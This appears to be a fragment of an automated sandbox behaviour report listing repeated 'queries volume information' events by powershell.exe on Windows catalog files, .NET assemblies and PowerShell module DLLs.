                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
